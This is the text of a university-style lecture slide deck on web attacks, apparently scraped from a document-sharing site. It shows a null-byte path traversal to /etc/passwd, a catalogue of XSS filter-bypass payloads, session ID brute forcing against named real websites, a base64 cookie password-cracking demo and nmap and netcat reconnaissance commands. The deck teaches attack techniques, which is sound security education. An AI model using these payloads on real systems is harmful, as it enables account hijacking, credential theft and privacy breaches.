![Page 71: Network Security Part II: Attacks Network Security Part II: Attacks Web Attacks](https://reader035.vdocument.in/reader035/viewer/2022062300/56649e105503460f94afb87d/html5/thumbnails/71.jpg)
•Many system put limits on how much data a variable can store or a system can handle.
•Often times if these limits are exceeded, the data will still be used, but bypass certain security considerations.
• URL’s such as:http://www.foo.com/cgi?param=filename
• Replaced with: http://www.foo.com/cgi?param=<2K_of_Data>
Long URL’sLong URL’s
![Page 72: Network Security Part II: Attacks Network Security Part II: Attacks Web Attacks](https://reader035.vdocument.in/reader035/viewer/2022062300/56649e105503460f94afb87d/html5/thumbnails/72.jpg)
Case SensitivityCase Sensitivity
• Case sensitivity may play a roll in many security filtration systems.
• Alternating case on URL parameters may be used to bypass certain restrictions.
http://foo.com/cgi?param=barhttp://foo.com/cgi?param=BaRhttp://foo.com/CGI?param=BAR
![Page 73: Network Security Part II: Attacks Network Security Part II: Attacks Web Attacks](https://reader035.vdocument.in/reader035/viewer/2022062300/56649e105503460f94afb87d/html5/thumbnails/73.jpg)
Method SwitchingMethod Switching
• Many web applications do not properly perform HTTP Request Method sanity checking.
• Performing Method Switching can be used to bypass IDS, logging features and CGI security mechanisms.
• Most web servers do not log "POST" data and thus forensic analysis is harder to perform.
The Request Method: GET /cgi-bin/some.cgi
can become: POST /cgi-bin/some.cgi
![Page 74: Network Security Part II: Attacks Network Security Part II: Attacks Web Attacks](https://reader035.vdocument.in/reader035/viewer/2022062300/56649e105503460f94afb87d/html5/thumbnails/74.jpg)
The Method token indicates the method to be performed on the resource identified by the Request-URI.
HTTP 1.1 MethodsHTTP 1.1 Methods
• OPTIONS• GET• HEAD• POST • PUT• DELETE• TRACE• CONNECT
![Page 75: Network Security Part II: Attacks Network Security Part II: Attacks Web Attacks](https://reader035.vdocument.in/reader035/viewer/2022062300/56649e105503460f94afb87d/html5/thumbnails/75.jpg)
Using your “HEAD”Using your “HEAD”
• The “HEAD” request method can be used to determine if a particular HTTP resource is accessible without actually downloading the resource data.
Scans and web application attacks can be made to be more effective using this technique.
![Page 76: Network Security Part II: Attacks Network Security Part II: Attacks Web Attacks](https://reader035.vdocument.in/reader035/viewer/2022062300/56649e105503460f94afb87d/html5/thumbnails/76.jpg)
Null Character InjectionNull Character Injection• Hex encoded null characters
can be used to thwart some security mechanisms.
• This happens because in the “C” programming language, a null character designates the end of a string.
• So If a CGI appending a “.html” to an input parameter:http://foo.com/cgi?file=../../etc/passwd%00
• Will cut off appending “.html”.
![Page 77: Network Security Part II: Attacks Network Security Part II: Attacks Web Attacks](https://reader035.vdocument.in/reader035/viewer/2022062300/56649e105503460f94afb87d/html5/thumbnails/77.jpg)
Unicode (UTF-8) Unicode (UTF-8) EncodedEncoded
• Unicode is a universal way to represent characters.
• However, unicode can also be used to circumvent security mechanisms by representing information in another fashion.
• Microsoft IIS has had security issues in the past while supporting unicode.
![Page 78: Network Security Part II: Attacks Network Security Part II: Attacks Web Attacks](https://reader035.vdocument.in/reader035/viewer/2022062300/56649e105503460f94afb87d/html5/thumbnails/78.jpg)
URL Encoded StringURL Encoded String
• The specification for URLs (RFC 1738, Dec. '94) poses a problem in that it limits the use of allowed characters in URLs to only a limited subset of the US-ASCII character set:
• "...Only alphanumerics [0-9a-zA-Z], the special characters "$_.+!*'()," [not including the quotes - ed], and reserved characters used for their reserved purposes may be used unencoded within a URL."
![Page 79: Network Security Part II: Attacks Network Security Part II: Attacks Web Attacks](https://reader035.vdocument.in/reader035/viewer/2022062300/56649e105503460f94afb87d/html5/thumbnails/79.jpg)
XSS Filter-Bypass XSS Filter-Bypass ManipulationManipulation
• This technique is used pass various types of client-side scripting language through implemented security filters.
• The idea is to be able to achieve client-side execution of a client-side script.
• There are several techniques used to perform this attack.
![Page 80: Network Security Part II: Attacks Network Security Part II: Attacks Web Attacks](https://reader035.vdocument.in/reader035/viewer/2022062300/56649e105503460f94afb87d/html5/thumbnails/80.jpg)
Hammer the FiltersHammer the Filters
•Submit all the raw HTML tags you can find, and then view the output results.
•Combine HTML with tag attributes, such as SRC, STYLE, HREF and OnXXX (JavaScript Event Handler).
•This will show what HTML is allowed, what the changes were, and possible dangerous HTML that can be exploited.
![Page 81: Network Security Part II: Attacks Network Security Part II: Attacks Web Attacks](https://reader035.vdocument.in/reader035/viewer/2022062300/56649e105503460f94afb87d/html5/thumbnails/81.jpg)
SRCing the ProtocolSRCing the Protocol
•Using the “javascript” protocol in an HTML source attribute.
<IMG SRC="javascript:js_expression">
<IMG SRC="javascript:alert('test');">
![Page 82: Network Security Part II: Attacks Network Security Part II: Attacks Web Attacks](https://reader035.vdocument.in/reader035/viewer/2022062300/56649e105503460f94afb87d/html5/thumbnails/82.jpg)
Alternate Protocol Alternate Protocol SRCingSRCing
•Same technique as the previous, however, using the protocol “livescript” and “mocha” will yield the same effect.
<IMG SRC=“livescript:js_expression">
<IMG SRC=“mocha:alert('test');">
![Page 83: Network Security Part II: Attacks Network Security Part II: Attacks Web Attacks](https://reader035.vdocument.in/reader035/viewer/2022062300/56649e105503460f94afb87d/html5/thumbnails/83.jpg)
Decimal HTML EntitiesDecimal HTML Entities
•Variation on previous techniques, using decimal HTML entities between the protocol characters can be used to bypass filters, yet still execute JavaScript.<IMG SRC=“java
script:js_expression">
•\09 \10 \11 \12 \13 have all been seen to work
![Page 84: Network Security Part II: Attacks Network Security Part II: Attacks Web Attacks](https://reader035.vdocument.in/reader035/viewer/2022062300/56649e105503460f94afb87d/html5/thumbnails/84.jpg)
Hex HTML EntitiesHex HTML Entities
•Another variation on the previous example, HEX HTML entities may also be used to bypass filter restriction, yet execute JavaScript.<IMG SRC=“java
script:js_expression">
![Page 85: Network Security Part II: Attacks Network Security Part II: Attacks Web Attacks](https://reader035.vdocument.in/reader035/viewer/2022062300/56649e105503460f94afb87d/html5/thumbnails/85.jpg)
Padding HTML EntitiesPadding HTML Entities
•Padding HTML entities with “0’s” may also be used to bypass the filters, yet still execute JavaScript.
<IMG SRC=“java	script:js_expression">
![Page 86: Network Security Part II: Attacks Network Security Part II: Attacks Web Attacks](https://reader035.vdocument.in/reader035/viewer/2022062300/56649e105503460f94afb87d/html5/thumbnails/86.jpg)
STYLE JavaScript TypeSTYLE JavaScript Type•Changing the MIME-TYPE on a “style” tag
may be used to execute JavaScript.
<style TYPE="text/javascript">JS EXPRESSION</style>
<style TYPE="text/javascript">Alert(document.domain);</style>
![Page 87: Network Security Part II: Attacks Network Security Part II: Attacks Web Attacks](https://reader035.vdocument.in/reader035/viewer/2022062300/56649e105503460f94afb87d/html5/thumbnails/87.jpg)
STYLE JavaScript X-STYLE JavaScript X-TypeType
•Variation on the previous example, but by using the “application/x-javascript” MIME-TYPE, the filters may be bypassed.
<STYLE TYPE="application/x-javascript">
alert('JavaScript has been Executed');
</STYLE>
![Page 88: Network Security Part II: Attacks Network Security Part II: Attacks Web Attacks](https://reader035.vdocument.in/reader035/viewer/2022062300/56649e105503460f94afb87d/html5/thumbnails/88.jpg)
STYLE JavaScript STYLE JavaScript ImportImport
•Using the @import feature in CSS may be used to perform JavaScript protocol SRCing.
<style TYPE="text/css">
@import url(javascript:alert('Javascript is executed'));
</style>
![Page 89: Network Security Part II: Attacks Network Security Part II: Attacks Web Attacks](https://reader035.vdocument.in/reader035/viewer/2022062300/56649e105503460f94afb87d/html5/thumbnails/89.jpg)
STYLE URL ImportSTYLE URL Import
•Using the @import feature in CSS can also be used to import JavaScript from another HTTP resource.
<STYLE type=text/css>
@import url(http://www.test.com);
</STYLE>
![Page 90: Network Security Part II: Attacks Network Security Part II: Attacks Web Attacks](https://reader035.vdocument.in/reader035/viewer/2022062300/56649e105503460f94afb87d/html5/thumbnails/90.jpg)
LINK Style SheetLINK Style Sheet
•The “LINK” tag can be used to import JavaScript from a remote HTTP resource.
<LINK REL=STYLESHEET TYPE="text/javascript" SRC="javascript_path.js">
![Page 91: Network Security Part II: Attacks Network Security Part II: Attacks Web Attacks](https://reader035.vdocument.in/reader035/viewer/2022062300/56649e105503460f94afb87d/html5/thumbnails/91.jpg)
Style Left ExpressionStyle Left Expression
•A few CSS features used together to execute JavaScript.
<PSTYLE="left:expression(eval('alert(\'JavaScript is executed\');window.close()'))" >
![Page 92: Network Security Part II: Attacks Network Security Part II: Attacks Web Attacks](https://reader035.vdocument.in/reader035/viewer/2022062300/56649e105503460f94afb87d/html5/thumbnails/92.jpg)
Remote SRCingRemote SRCing
•A few HTML tags, such as “LAYER”, “ILAYER”, “FRAME”, and “IFRAME” can be used to src in JavaScript from remote resources.
<LAYER SRC="js.html"></LAYER>
<LAYER SRC="js.html"></LAYER>
![Page 93: Network Security Part II: Attacks Network Security Part II: Attacks Web Attacks](https://reader035.vdocument.in/reader035/viewer/2022062300/56649e105503460f94afb87d/html5/thumbnails/93.jpg)
……AND CURLYAND CURLY
<IMG SRC="&{javascript_expression};">
<IMG SRC="&{alert(‘alert’)};">
•Syntax must be exact.
![Page 94: Network Security Part II: Attacks Network Security Part II: Attacks Web Attacks](https://reader035.vdocument.in/reader035/viewer/2022062300/56649e105503460f94afb87d/html5/thumbnails/94.jpg)
Dangerous HTML TagsDangerous HTML Tags
•“All HTML is to be considered dangerous, but these tags are the most insidious.”
– <APPLET>– <BODY>– <EMBED>– <FRAME>– <FRAMESET>– <HTML>– <IFRAME>– <IMG>– <LAYER>– <ILAYER>– <META>– <OBJECT>– <SCRIPT>– <STYLE>
![Page 95: Network Security Part II: Attacks Network Security Part II: Attacks Web Attacks](https://reader035.vdocument.in/reader035/viewer/2022062300/56649e105503460f94afb87d/html5/thumbnails/95.jpg)
Dangerous HTML Dangerous HTML AttributesAttributes
•(HTML Tags with these attributes.)– SRC– LOWSRC– STYLE– HREF
![Page 96: Network Security Part II: Attacks Network Security Part II: Attacks Web Attacks](https://reader035.vdocument.in/reader035/viewer/2022062300/56649e105503460f94afb87d/html5/thumbnails/96.jpg)
Web Applications LoginsWeb Applications Logins
![Page 97: Network Security Part II: Attacks Network Security Part II: Attacks Web Attacks](https://reader035.vdocument.in/reader035/viewer/2022062300/56649e105503460f94afb87d/html5/thumbnails/97.jpg)
Traditional Brute ForceTraditional Brute Force
guest
Admin
123123
Password
Etc.
![Page 98: Network Security Part II: Attacks Network Security Part II: Attacks Web Attacks](https://reader035.vdocument.in/reader035/viewer/2022062300/56649e105503460f94afb87d/html5/thumbnails/98.jpg)
Session ID OverviewSession ID Overview
•HTTP is stateless protocol•Rather than make a user authenticate
upon each click in a web application, a sense of “state” is created
•In order to maintain state, a shared string, token, or secret between HTTP client and server is usually used by developers
•Essentially, authentication data (username/password) exchanged for “Session ID”
![Page 99: Network Security Part II: Attacks Network Security Part II: Attacks Web Attacks](https://reader035.vdocument.in/reader035/viewer/2022062300/56649e105503460f94afb87d/html5/thumbnails/99.jpg)
Web State AttacksWeb State Attacks
•Session Replay– A traditional replay attack in the cryptography
sense is an attack in which a valid data transmission is maliciously or fraudulently repeated, either by the originator or by an adversary who intercepts the data and retransmits it.
•Session Hijacking– Seizing control of a legitimate user's web
application session while that user is “logged in” to the application
![Page 100: Network Security Part II: Attacks Network Security Part II: Attacks Web Attacks](https://reader035.vdocument.in/reader035/viewer/2022062300/56649e105503460f94afb87d/html5/thumbnails/100.jpg)
Session IDSession ID
• Session ID should IN THEORY be just as secure as username/password
![Page 101: Network Security Part II: Attacks Network Security Part II: Attacks Web Attacks](https://reader035.vdocument.in/reader035/viewer/2022062300/56649e105503460f94afb87d/html5/thumbnails/101.jpg)
Session ID OverviewSession ID Overview
• While it is generally clear that username/password pairs are indeed authentication data and therefore sensitive, it is not generally understood that session IDs are also just as sensitive because of their frequent use for authentication. See RFC 2964 (Use of HTTP State Management).
![Page 102: Network Security Part II: Attacks Network Security Part II: Attacks Web Attacks](https://reader035.vdocument.in/reader035/viewer/2022062300/56649e105503460f94afb87d/html5/thumbnails/102.jpg)
Session ID OverviewSession ID Overview
• Session IDs are commonly stored in cookies and/or URLs, and hidden fields of web pages (or some combination)
• Session ID generated by WEB SERVER (IIS, etc.) when the user first hits the site or by WEB APPLICATION (ATG dynamo, Apache Tomcat, BEA Websphere, .jsp, .asp, perl, etc.) when the user logs in
![Page 103: Network Security Part II: Attacks Network Security Part II: Attacks Web Attacks](https://reader035.vdocument.in/reader035/viewer/2022062300/56649e105503460f94afb87d/html5/thumbnails/103.jpg)
Cookie RefresherCookie Refresher
• Sometimes the cookies are set to expire (i.e., be deleted) upon closing the browser; these are typically called “session cookies” or “non-persistent” cookies
• Persistent cookies last beyond a user’s session (i.e. “Remember Me” option)
• Persistent cookies are usually stored on the user’s hard drive in a location according to the particular operating system and browser (e.g. , C:\Program files\netscape \users\username\cookies.txt for Netscape and C:\Documents and Settings \username\Cookies for IE on Win2K).
![Page 104: Network Security Part II: Attacks Network Security Part II: Attacks Web Attacks](https://reader035.vdocument.in/reader035/viewer/2022062300/56649e105503460f94afb87d/html5/thumbnails/104.jpg)
Cookie RefresherCookie Refresher•Cookie Refresher (RFC 2965)
1.) domain: The website domain that created and that can read the variable. 2.) flag: A TRUE/FALSE value indicating whether all machines within a given domain can
access the variable.3.) path: Pathname of the URL(s) capable of accessing the cookie from the domain.4.) secure: A TRUE/FALSE value indicating if an SSL connection with the domain is needed
to access the variable. 5.) expiration: The Unix time that the variable will expire on. Unix time is defined as the
number of seconds since 00:00:00 GMT on Jan 1, 1970. Omitting the expiration date signals to the browser to store the cookie only in memory; it will be erased when the browser is closed. (expires July 27, 2006)
6.) name: The name of the Session ID variable (in this case Apache).
7.) value: The value of the Session ID variable (in this case 64.3.40.151.16018996349247480 ) .
www.redhat.com FALSE / FALSE 1154029490 Apache 64.3.40.151.16018996349247480
1 2 3 4 5 6 7
![Page 105: Network Security Part II: Attacks Network Security Part II: Attacks Web Attacks](https://reader035.vdocument.in/reader035/viewer/2022062300/56649e105503460f94afb87d/html5/thumbnails/105.jpg)
Cookie Stored Session ID Cookie Stored Session ID ExamplesExamples
.www.ibm.com TRUE /rc FALSE 1293768100 sauidp p0010000000006DCC10255298230000591992.003F75FEF2
.yahoo.com TRUE / FALSE 1271361612 B 3qpaarsu48dai&b=2
.amazon.com FALSE / FALSE 1026115299 session-id 103-1456769-7895034
.ebay.com TRUE / FALSE 1183296824 lucky8 694036
.starwars.com TRUE / FALSE 1341753778 Wookie-Cookie
13fe8fff4799f27dcf19c959dafa8437
.yahoo.com TRUE / FALSE 1154029490 I ir=9p&in=4aweec66&i1=AFABCl
.yahoo.com TRUE / FALSE 1154029490 PU t=1
![Page 106: Network Security Part II: Attacks Network Security Part II: Attacks Web Attacks](https://reader035.vdocument.in/reader035/viewer/2022062300/56649e105503460f94afb87d/html5/thumbnails/106.jpg)
URL Stored Session IDURL Stored Session ID
• http://www.123greetings.com/view/7AD30725122120803 • http://evite.citysearch.com/r?iid=KVIJBUFDLPVMIVLXYUKB • http://view.greetings.yahoo.com/greet/view?FXA96K95JAEJS• http://www.atg.com/en/index.jhtml;jsessionid=HYMJK3PJUSJ4CCQCQBJCGWQKAKAFUIV0?_requestid=21122
• http://www.amazon.com/exec/obidos/subst/home/home.html/102-4524380-3923344
![Page 107: Network Security Part II: Attacks Network Security Part II: Attacks Web Attacks](https://reader035.vdocument.in/reader035/viewer/2022062300/56649e105503460f94afb87d/html5/thumbnails/107.jpg)
Session IDs in HTML Session IDs in HTML Hidden FieldsHidden Fields
<FORM METHOD=POST ACTION="/cgi-bin/bankonline.cgi">
<input type="hidden" name="sessionID" value=”abcde1234”>
<input type="hidden" name="useraccount" value=”673-12745”>
<input type="submit" name="Access My Bank Information"></form>
![Page 108: Network Security Part II: Attacks Network Security Part II: Attacks Web Attacks](https://reader035.vdocument.in/reader035/viewer/2022062300/56649e105503460f94afb87d/html5/thumbnails/108.jpg)
Session ID Session ID SecuritySecurity Overview Overview
Session ID security is a microcosm of Web Application Security.
Web Application Security cuts through many different aspects of an organization’s information security infrastructure
![Page 109: Network Security Part II: Attacks Network Security Part II: Attacks Web Attacks](https://reader035.vdocument.in/reader035/viewer/2022062300/56649e105503460f94afb87d/html5/thumbnails/109.jpg)
An Example: Brute Forcing Session An Example: Brute Forcing Session ID’s in URLSID’s in URLS
Dear Terry Gillette, An Anonymous Admirer has sent you a greeting card from 123Greetings.com, a FREE service committed to keep people in touch. To see your greeting card, choose from any of the following options which works best for you. --------Method 1-------- Just click on the following Internet address (if that doesn't work for you, copy & paste the address onto your browser's address box.)
http://www30.123greetings.com/card/08/01/05/20/BG20801052002282.html
![Page 110: Network Security Part II: Attacks Network Security Part II: Attacks Web Attacks](https://reader035.vdocument.in/reader035/viewer/2022062300/56649e105503460f94afb87d/html5/thumbnails/110.jpg)
An Example: Brute An Example: Brute Forcing Session ID’s in Forcing Session ID’s in
URLSURLShttp://www.123greetings.com/view/AD30725122116211
http://www.123greetings.com/view/AD30725122118909
http://www.123greetings.com/view/AD30725122120803
http://www.123greetings.com/view/AD30725122122507
http://www.123greetings.com/view/AD30725122124100
As we start to associate that the date we sent these electronic cards on was July 25 at 12:21 PST, we can start to eliminate some more entropy out of this session ID (07251221). Notice then that we’re left with five incrementing “random” digits at the end of the URL. http://www.123greetings.com/view/AD30725122116211http://www.123greetings.com/view/AD30725122118909http://www.123greetings.com/view/AD30725122120803http://www.123greetings.com/view/AD30725122122507http://www.123greetings.com/view/AD30725122124100
![Page 111: Network Security Part II: Attacks Network Security Part II: Attacks Web Attacks](https://reader035.vdocument.in/reader035/viewer/2022062300/56649e105503460f94afb87d/html5/thumbnails/111.jpg)
An Example: Brute Forcing An Example: Brute Forcing Session ID’s in URLS Session ID’s in URLS AUTOMATED DEMO!AUTOMATED DEMO!
![Page 112: Network Security Part II: Attacks Network Security Part II: Attacks Web Attacks](https://reader035.vdocument.in/reader035/viewer/2022062300/56649e105503460f94afb87d/html5/thumbnails/112.jpg)
Why Brute Forcing Web Why Brute Forcing Web Session ID’s is BadSession ID’s is Bad
• Can result in an online user’s web application account being hijacked or loss of privacy
• Easy to exploit• Unlike typical login scenario, no failed login
lockout• Prevalent disclosure among security mailing lists• Typical security solutions (firewalls, IDS, etc.) do
nothing to detect attacks• Log data is usually not that detailed• IDS is not well developed for Web Application
attacks• SSL (Server side) does nothing to protect
against these attacks
![Page 113: Network Security Part II: Attacks Network Security Part II: Attacks Web Attacks](https://reader035.vdocument.in/reader035/viewer/2022062300/56649e105503460f94afb87d/html5/thumbnails/113.jpg)
In the NewsIn the News– “Privacy hole found in Verizon
Wireless Web site “ Computerworld, Sept 6, 2001.http://www.computerworld.com/securitytopics/security/privacy/story/0,10801,63587,00.htmlhttp://online.securityfocus.com/archive/1/211520
– https://www.app.airtouch.com/jstage/plsql/ec_navigation_wrapper.nav_frame_display?p_session_id=3346178&p_host=ACTION
![Page 114: Network Security Part II: Attacks Network Security Part II: Attacks Web Attacks](https://reader035.vdocument.in/reader035/viewer/2022062300/56649e105503460f94afb87d/html5/thumbnails/114.jpg)
URL Example: Brute Forcing URL Example: Brute Forcing Register.comRegister.com
Thank you for using register.com's Domain Manager. To change or re-enter your password, please copy and paste the URL below into the "Location" or "Address" field of your web browser and hit the 'Enter' key on your keyboard. Note: If your e-mail program supports HTML, you may be able to click on the link below. http://mydomain.register.com/change_password.cgi?155218782787 Note: Above link will be expire within three days
![Page 115: Network Security Part II: Attacks Network Security Part II: Attacks Web Attacks](https://reader035.vdocument.in/reader035/viewer/2022062300/56649e105503460f94afb87d/html5/thumbnails/115.jpg)
Example 2: Brute Forcing Web Example 2: Brute Forcing Web Session ID’sSession ID’s
http://mydomain.register.com/change_password.cgi?486218782865http://mydomain.register.com/change_password.cgi?440218782891 http://mydomain.register.com/change_password.cgi?685218782917 http://mydomain.register.com/change_password.cgi?505218782956 http://mydomain.register.com/change_password.cgi?435218782969
http://mydomain.register.com/change_password.cgi?486218782865 http://mydomain.register.com/change_password.cgi?440218782891http://mydomain.register.com/change_password.cgi?685218782917http://mydomain.register.com/change_password.cgi?505218782956http://mydomain.register.com/change_password.cgi?435218782969
![Page 116: Network Security Part II: Attacks Network Security Part II: Attacks Web Attacks](https://reader035.vdocument.in/reader035/viewer/2022062300/56649e105503460f94afb87d/html5/thumbnails/116.jpg)
URL Example – Brute Forcing URL Example – Brute Forcing Dfilm.comDfilm.com
-----Original Message-----
From: [email protected] [mailto:[email protected]]
Sent: Monday, July 01, 2002 1:38 PM
Subject: D.FILM Digital Movie for Dave
Dave created a digital movie for you!
You can view it at the following URL:
http://mm.dfilm.com/mm2s/mm_route.php?id=110532
Cheers,
Dave and DFILM.
Be sure to check out the web site at http://www.dfilm.com
![Page 117: Network Security Part II: Attacks Network Security Part II: Attacks Web Attacks](https://reader035.vdocument.in/reader035/viewer/2022062300/56649e105503460f94afb87d/html5/thumbnails/117.jpg)
URL Example – Brute Forcing URL Example – Brute Forcing Dfilm.comDfilm.com
No privacy of other user’s creations:
http://mm.dfilm.com/mm2s/mm_route.php?id=110532
http://mm.dfilm.com/mm2s/mm_route.php?id=110531
http://mm.dfilm.com/mm2s/mm_route.php?id=110530
http://mm.dfilm.com/mm2s/mm_route.php?id=110529
http://mm.dfilm.com/mm2s/mm_route.php?id=110528
http://mm.dfilm.com/mm2s/mm_route.php?id=110527
http://mm.dfilm.com/mm2s/mm_route.php?id=110526
http://mm.dfilm.com/mm2s/mm_route.php?id=…
![Page 118: Network Security Part II: Attacks Network Security Part II: Attacks Web Attacks](https://reader035.vdocument.in/reader035/viewer/2022062300/56649e105503460f94afb87d/html5/thumbnails/118.jpg)
URL Example – Sendomatic.comURL Example – Sendomatic.com
http://www.sendomatic.com/servlets/servlets/mysendo?uId=76330
![Page 119: Network Security Part II: Attacks Network Security Part II: Attacks Web Attacks](https://reader035.vdocument.in/reader035/viewer/2022062300/56649e105503460f94afb87d/html5/thumbnails/119.jpg)
URL Example – Sendomatic.comURL Example – Sendomatic.comView other people’s events. Crash a party, edit an event, cancel and event, etc.
http://www.sendomatic.com/servlets/servlets/mysendo?uId=76330http://www.sendomatic.com/servlets/servlets/mysendo?uId=76331http://www.sendomatic.com/servlets/servlets/mysendo?uId=76332http://www.sendomatic.com/servlets/servlets/mysendo?uId=76333http://www.sendomatic.com/servlets/servlets/mysendo?uId=76334http://www.sendomatic.com/servlets/servlets/mysendo?uId=76335http://www.sendomatic.com/servlets/servlets/mysendo?uId=76336http://www.sendomatic.com/servlets/servlets/mysendo?uId=…
![Page 120: Network Security Part II: Attacks Network Security Part II: Attacks Web Attacks](https://reader035.vdocument.in/reader035/viewer/2022062300/56649e105503460f94afb87d/html5/thumbnails/120.jpg)
Cookie Example – Freeservers.comCookie Example – Freeservers.com
![Page 121: Network Security Part II: Attacks Network Security Part II: Attacks Web Attacks](https://reader035.vdocument.in/reader035/viewer/2022062300/56649e105503460f94afb87d/html5/thumbnails/121.jpg)
Cookie Example – Freeservers.comCookie Example – Freeservers.com
•LOGIN=dGVzdGluZzEyMy5pdGdvLmNvbToxMjMxMjM0;
• Base 64 decode the string: http://www.securitystats.com/tools/base64.asp
testing123.itgo.com:1231234 username:password
• Next, automate it with a perl exploit by feeding encoded strings in to the cookie
![Page 122: Network Security Part II: Attacks Network Security Part II: Attacks Web Attacks](https://reader035.vdocument.in/reader035/viewer/2022062300/56649e105503460f94afb87d/html5/thumbnails/122.jpg)
Cookie Example – Freeservers.comCookie Example – Freeservers.com
%perl freeservershack.pltrying testtrying test123trying 123123trying 1231234 Cracked it! The password to testing123.itgo.com is 1231234
GET http://testing123.itgo.com/cgi-bin/util/my_member_area
User-Agent: Mozilla/4.75 [en] (Windows NT 5.0; U)Cookie: LOGIN=dGVzdGluZzEyMy5pdGdvLmNvbToxMjMxMjM%3DCookie2: $Version=1 %
![Page 123: Network Security Part II: Attacks Network Security Part II: Attacks Web Attacks](https://reader035.vdocument.in/reader035/viewer/2022062300/56649e105503460f94afb87d/html5/thumbnails/123.jpg)
Cookie Example – Cookie Example – Freeservers.comFreeservers.com
• Or a much longer way: use the brute forcer on every single cookie character combination
![Page 124: Network Security Part II: Attacks Network Security Part II: Attacks Web Attacks](https://reader035.vdocument.in/reader035/viewer/2022062300/56649e105503460f94afb87d/html5/thumbnails/124.jpg)
Cookie/URL Example – Cookie/URL Example – Amazon.comAmazon.com
• Some sites use the URL AND Cookie for authentication:
![Page 125: Network Security Part II: Attacks Network Security Part II: Attacks Web Attacks](https://reader035.vdocument.in/reader035/viewer/2022062300/56649e105503460f94afb87d/html5/thumbnails/125.jpg)
6 Common Problems6 Common Problems
• Weak Algorithm – Many of the most popular web sites today are currently using linear algorithms based on easily predictable variables such as time or IP address.
• No Form of Account Lockout – With regard to Session ID brute force attacks, an attacker can probably try hundreds or thousands of Session IDs embedded in a legitimate URL without a single complaint from the web server.
• Short Key Space – Even the most cryptographically strong algorithm still allows an active Session ID to be easily determined if the size of the string’s key space is not sufficiently large.
![Page 126: Network Security Part II: Attacks Network Security Part II: Attacks Web Attacks](https://reader035.vdocument.in/reader035/viewer/2022062300/56649e105503460f94afb87d/html5/thumbnails/126.jpg)
6 Common Problems – Continued6 Common Problems – Continued
• Indefinite Expiration on Server– Session IDs that do not expire on the web server can allow an attacker unlimited time to guess a valid Session ID.
• Transmitted in the Clear – Assuming SSL is not being used while the Session ID cookie is transmitted to and from the browser, the Session ID could be sniffed across a flat network taking the guess-work away for a miscreant. This is still a problem with proxy servers.
• Insecure Retrieval – By tricking the user’s browser into visiting another site, an attacker can retrieve stored Session ID information and quickly exploit this information before the user’s sessions expire. This can be done a number of ways: DNS poisoning, Cross-site Scripting, etc.
![Page 127: Network Security Part II: Attacks Network Security Part II: Attacks Web Attacks](https://reader035.vdocument.in/reader035/viewer/2022062300/56649e105503460f94afb87d/html5/thumbnails/127.jpg)
ToolsTools
• Sessions Auditorwww.idefense.com/idtools/Session_Auditor.zip
• Visual Testing – WebSleuthwww.geocities.com/dzzie/sleuth
• WebProxy -www.atstake.com/research/tools/index.html
• HTTPush - httpush.sourceforge.net
• Achilles - www.digizen-security.com/downloads.html
• MiniBrowser - aignes.com/download.htm
![Page 128: Network Security Part II: Attacks Network Security Part II: Attacks Web Attacks](https://reader035.vdocument.in/reader035/viewer/2022062300/56649e105503460f94afb87d/html5/thumbnails/128.jpg)
• Some good things:– Completeness– Large knowledge bases (at least possibly)
• Puts Web security assessment into the hands of anyone who calls themselves a “Information Security Expert”.
Why Automated Tools Why Automated Tools Don’t Work Very WellDon’t Work Very Well
![Page 129: Network Security Part II: Attacks Network Security Part II: Attacks Web Attacks](https://reader035.vdocument.in/reader035/viewer/2022062300/56649e105503460f94afb87d/html5/thumbnails/129.jpg)
Why Automated Tools Why Automated Tools Don’t Work Very WellDon’t Work Very Well
•Every programmer does things a little different
•Authentication schemes are hard to automate
•Error codes are not standardized•Sometimes simple things like SSL get in the
way
![Page 130: Network Security Part II: Attacks Network Security Part II: Attacks Web Attacks](https://reader035.vdocument.in/reader035/viewer/2022062300/56649e105503460f94afb87d/html5/thumbnails/130.jpg)
Why People are BetterWhy People are Better
•Recognition of subtle errors•We understand the impact and therefore
the risk of a vulnerability•We are grounded in the fundamentals of
Computer Science and therefore are able to find “real” bugs, flaws in logic
![Page 131: Network Security Part II: Attacks Network Security Part II: Attacks Web Attacks](https://reader035.vdocument.in/reader035/viewer/2022062300/56649e105503460f94afb87d/html5/thumbnails/131.jpg)
Web Hacking AccessoriesWeb Hacking Accessories
• Some helpful tools include….– A port scanner (Nmap et. al.)
www.insecure.org/nmap/
– Netcat; the network swiss army knife http://www.atstake.com/research/tools/network_utilities/
– A vulnerability scanner; Whisker http://www.wiretrip.net/rfp/p/doc.asp/i3/d21.htm
– Open SSL source and documentation• OpenSSL, RFC 2246
![Page 132: Network Security Part II: Attacks Network Security Part II: Attacks Web Attacks](https://reader035.vdocument.in/reader035/viewer/2022062300/56649e105503460f94afb87d/html5/thumbnails/132.jpg)
New tools on the New tools on the horizon…horizon…
New tools on the New tools on the horizon…horizon…
• Nikto– CGI scanner, similar to whisker 1.4. Checks for CGIs,
common dirs, and old versions Database frequently updated http://www.cirt.net/
• WHArsenal– Set of CGIs that plug into an existing Apache install. Allows
for all kinds of requests, while controling/modifying request particulars. http://community.whitehatsec.com/
• @stake WebProxy– Assessment proxy with full fuzzer/rewriting capabilities.
Implemented in Java; supports Linux, Solaris, and Windows. http://www.atstake.com/
• Nessus– Has a few new interesting web assessment plugins which
do site crawling/mirroring and a few other interesting things. http://www.nessus.org/
![Page 133: Network Security Part II: Attacks Network Security Part II: Attacks Web Attacks](https://reader035.vdocument.in/reader035/viewer/2022062300/56649e105503460f94afb87d/html5/thumbnails/133.jpg)
Basic Training for Web Basic Training for Web Combat…Combat…
• Port scanning– Look for well-known TCP web ports.
• 80, 81, 443, 8000, 8080, etc…
• Using FScan (from Foundstone)fscan -p 80,81,443,8000,8080 10.0.0.1
• Using nmap (by Fyodor)nmap -p 80,81,443,8000,8080 10.0.0.1
![Page 134: Network Security Part II: Attacks Network Security Part II: Attacks Web Attacks](https://reader035.vdocument.in/reader035/viewer/2022062300/56649e105503460f94afb87d/html5/thumbnails/134.jpg)
Basic Training for Web Basic Training for Web Combat…Combat…
• Fingerprinting – HTTP Banner grabbing.– netcat as a TCP client (even telnet works)
nc 10.0.0.1 80
HEAD / HTTP/1.0
• Advanced HTTP methods:– TRACE, OPTIONS, etc.
![Page 135: Network Security Part II: Attacks Network Security Part II: Attacks Web Attacks](https://reader035.vdocument.in/reader035/viewer/2022062300/56649e105503460f94afb87d/html5/thumbnails/135.jpg)
Basic Training for Web Basic Training for Web Combat…Combat…
Shaking the tree for the low hanging fruit….
• Scan using a database of known web vulnerabilities.
• Whisker (by Rain Forest Puppy)./whisker.pl -h 10.0.0.1 -I 1
